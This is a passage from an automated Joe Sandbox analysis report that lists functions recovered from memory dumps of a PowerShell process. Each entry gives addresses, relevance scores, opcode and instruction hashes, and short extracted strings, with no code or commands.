                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f4950fa8863b071e190f8279f00851b835b730207e1708a7e281f81057286d9
                                                                      • Instruction ID: c1219c111f964c010e47bdfcf0e60340ca48c8abc85a3eba6a1875b5419b5f79
                                                                      • Opcode Fuzzy Hash: 9f4950fa8863b071e190f8279f00851b835b730207e1708a7e281f81057286d9
                                                                      • Instruction Fuzzy Hash: DED0A71278112117179875FE5A006BFA5CECFC94A9746003EDA09C7341FC48EC0643F1
                                                                      Function 04A8DC98 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 448950e5faef0f6d7ab030c1106c0d7c8fc137b59eab883bee02b80eb1073dca
                                                                      • Instruction ID: c191dc3e03246ade35fa2314f53eb0adbb743d4f03f989c8931c4e3b2c61b831
                                                                      • Opcode Fuzzy Hash: 448950e5faef0f6d7ab030c1106c0d7c8fc137b59eab883bee02b80eb1073dca
                                                                      • Instruction Fuzzy Hash: CAE0C271700B10079711BB2EA80085F77DBEFC59B1300846EE05ACB340EFA0ED018BE5
                                                                      Function 04A8DCE8 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                      • Instruction ID: f08876b9c5e9556c1c06bbce7623be4f351ff4b33e45cd07a0345e9269102a44
                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                      • Instruction Fuzzy Hash: E3E08631B10014978B0C9999D4104EDF7BADBCC220F04807ED90AA7380DA32691586E1
                                                                      Function 04A88739 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e3898340946de835c4bc365ffcc22e1076fcac4241bc505e8214be1a1f22c35
                                                                      • Instruction ID: 86f57bc0eb1fb1f52d3296749d315eea636d04c78fe25ec8725fdf81ae91275e
                                                                      • Opcode Fuzzy Hash: 6e3898340946de835c4bc365ffcc22e1076fcac4241bc505e8214be1a1f22c35
                                                                      • Instruction Fuzzy Hash: BCE01231805209DFD719FFB4D46A4A9BB34FB11301F4101FDD51387251EA311A46CB90
                                                                      Function 04A88800 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 877b6a4122852cf14b7acdb0c030941ad6a39855103cbbc2f53b036fd55775b1
                                                                      • Instruction ID: c70ac6a0e97942c9fbe24614ff056eac00eb32302b802f133f774b4d7826ff90
                                                                      • Opcode Fuzzy Hash: 877b6a4122852cf14b7acdb0c030941ad6a39855103cbbc2f53b036fd55775b1
                                                                      • Instruction Fuzzy Hash: 79E01A38A0824A9FC714EFB8D456569FFB0FB46304F1645A9DD4A97351EA306C41DB81
                                                                      Function 04A8F460 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e4ec6807574243c6760bb9cad81ff1a6e086a9e762a4f59c7dcb4fab5d47f04
                                                                      • Instruction ID: 8ca0b584e7e26bd9193c938278521f7f08038ff4d6647590f3dd5c8e6bcdfc77
                                                                      • Opcode Fuzzy Hash: 9e4ec6807574243c6760bb9cad81ff1a6e086a9e762a4f59c7dcb4fab5d47f04
                                                                      • Instruction Fuzzy Hash: 47E01A70E0010A9F8B90EFA884415AAFBF0EB48200F14C5AE9908D3315E7324612CB80
                                                                      Function 04A8F470 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction ID: 5c977d23bc8b51b436aecdaaa6bfb8e238b24634400250baed27bffff8a985de
                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction Fuzzy Hash: 4CD067B0D0420A9F8780EFADC94156EFBF4EB48210F6085AE9919E7301F7329A12CBD5
                                                                      Function 04A88748 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be01f2936f57dbc65e5b934ff463f44ac3846e5a8d54b33ebf80feee1c957365
                                                                      • Instruction ID: 65469c9b5c03a6fec6f4d16bbcbf8e703241abf16b2936eba04b85bb27922d25
                                                                      • Opcode Fuzzy Hash: be01f2936f57dbc65e5b934ff463f44ac3846e5a8d54b33ebf80feee1c957365
                                                                      • Instruction Fuzzy Hash: 45D017308051098BCB18BBA4E82B4BDBB34FA00301F4111ADD91752291EE322A4ACAC0
                                                                      Function 04A88810 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ef60999a2623e37dad3befab38c052bcb6d229569681b6d9869b0107be8474
                                                                      • Instruction ID: b11a94768f6200ef2a51b7ea53246a69e1522607d000185a2a9342ebcdd2feef
                                                                      • Opcode Fuzzy Hash: a7ef60999a2623e37dad3befab38c052bcb6d229569681b6d9869b0107be8474
                                                                      • Instruction Fuzzy Hash: A7D01734E0820A9F8B18EFA4E45A86EFBB4EB44300F0041ADDE4A93344EA306801CBC1
                                                                      Function 04A87932 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aec15d07f6956ec70f5ee1afcd413e862b081f812a449fe26c5c28ef270e4ab1
                                                                      • Instruction ID: 19a4d55c1e7dab3ee297766d3b7203f6bcc6c121dc7aee361940c95a07303190
                                                                      • Opcode Fuzzy Hash: aec15d07f6956ec70f5ee1afcd413e862b081f812a449fe26c5c28ef270e4ab1
                                                                      • Instruction Fuzzy Hash: 79D09E3418D3C45FC7178F7D94998193F705E0315030504EED495DF5B7C6258489CB06
                                                                      Function 04A8EA57 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0bdcc3494d87f9a4128b7f6fe3432b61d1f906b7c4de795870551b6aa4048e6
                                                                      • Instruction ID: 6146839bb8dc8c264e02e228551e559832daddd4e024a09e7c1f7d777a177ae7
                                                                      • Opcode Fuzzy Hash: a0bdcc3494d87f9a4128b7f6fe3432b61d1f906b7c4de795870551b6aa4048e6
                                                                      • Instruction Fuzzy Hash: 3DD09239B44218CFDB14DB98E895A9DF371FB84329F1180A9E51A97251CB32AD12CB40
                                                                      Function 04A87EA0 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af1b3f830520a111f3b79164bb99314ec217c6c6e7c727117000d6019d82bf38
                                                                      • Instruction ID: c6fb031ed916dfcc28e1ae4d9fd1e1ef00d8989102ec4404d971fbbe23582682
                                                                      • Opcode Fuzzy Hash: af1b3f830520a111f3b79164bb99314ec217c6c6e7c727117000d6019d82bf38
                                                                      • Instruction Fuzzy Hash: ABC0121410E3E10EEF03833988982027FB10A4341830E40DAC0C1CF8A3C668884AC713
                                                                      Function 04A87940 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51da31812aaaa2b2e166cad654d7aac1b2c78e41df5c4a55d5f00bd9880d7848
                                                                      • Instruction ID: 1b4bb4f818267bc6b6cbce0edbb866875d7c45288710438871723a383bc5dc58
                                                                      • Opcode Fuzzy Hash: 51da31812aaaa2b2e166cad654d7aac1b2c78e41df5c4a55d5f00bd9880d7848
                                                                      • Instruction Fuzzy Hash: 95B092300887088FC248AF7AA4448197729BB4021538004E9E82E4A6A7CE3AE885CB84

                                                                      Non-executed Functions

                                                                      Function 07921BE0 Relevance: 12.9, Strings: 10, Instructions: 399COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $c$j$84/k$84/k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-129371963
                                                                      • Opcode ID: 448e260f53c9215d018a2c2fbc15c4ca7e3cf26908322649dac9d0924bb2deb5
                                                                      • Instruction ID: 522b24f37bd109b937a8f8589f659e42ed41eab3394795904f7bb5172c0d8713
                                                                      • Opcode Fuzzy Hash: 448e260f53c9215d018a2c2fbc15c4ca7e3cf26908322649dac9d0924bb2deb5
                                                                      • Instruction Fuzzy Hash: C1D16CB1B4432ACFDB24AF6894007AAB7BAEFC6214F14807BC555CB256DB358C53C791
                                                                      Function 04A8304F Relevance: 12.9, Strings: 10, Instructions: 390COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p$p$p$p$p$p$p$p$p$p
                                                                      • API String ID: 0-1174775501
                                                                      • Opcode ID: 6686e983172f774cdb259dbd85a84d9d139df27c6b662f92169dd054361d44aa
                                                                      • Instruction ID: 5e0791eaf345a104966a93b3842dd044d6ea1e5648bfb5de53a09dee373086dc
                                                                      • Opcode Fuzzy Hash: 6686e983172f774cdb259dbd85a84d9d139df27c6b662f92169dd054361d44aa
                                                                      • Instruction Fuzzy Hash: FEC1135281E7D15FE703A73868752D67F708E53528B0A42DBC8D1CF0A3E50A594EC7BA
                                                                      Function 04A8336D Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p$p$p$p
                                                                      • API String ID: 0-3467077657
                                                                      • Opcode ID: 521139534d4eb577d4c2356167583758d96257f44e18dffaf7cc6af0e3698c8b
                                                                      • Instruction ID: d8a5dae8d78332a416d92f2ff5eca0b16de7e24bb94fe5bded7cf78fd84236ba
                                                                      • Opcode Fuzzy Hash: 521139534d4eb577d4c2356167583758d96257f44e18dffaf7cc6af0e3698c8b
                                                                      • Instruction Fuzzy Hash: 0741F59281E3E15FE703662868792C53F708E63558B0A41DBC8D1CF1A3E549694EC7B7
                                                                      Function 07922270 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k$J2k$J2k$J2k
                                                                      • API String ID: 0-2618344979
                                                                      • Opcode ID: 73fc636c45b1144e4b6aa9f7c1bf4b8d5769434fd6ad47585082be599240a6f8
                                                                      • Instruction ID: f1334499dd6ed6922bc3d53a1d216bb4ed69ac20105dee1725d0fbc4a69904bf
                                                                      • Opcode Fuzzy Hash: 73fc636c45b1144e4b6aa9f7c1bf4b8d5769434fd6ad47585082be599240a6f8
                                                                      • Instruction Fuzzy Hash: 31414BF0A0C366DFDB15AF1984007667BB8BF46718F0A80B7D4448F249C775C986DBA2
                                                                      Function 04A83475 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p$p$p$p
                                                                      • API String ID: 0-3467077657
                                                                      • Opcode ID: 46063a1dc00d634f740c6fa55f39d74ba34f11d8e9251a90ef4af0722a346097
                                                                      • Instruction ID: f256bfaada08deb75ed9c75edea08de5ecc57c0694f4b678fce6fd828a33d420
                                                                      • Opcode Fuzzy Hash: 46063a1dc00d634f740c6fa55f39d74ba34f11d8e9251a90ef4af0722a346097
                                                                      • Instruction Fuzzy Hash: 07211A5280E3D15FE707A738A8762C57F618E53058B0A42DBC4E58F0A3E509595ECBBA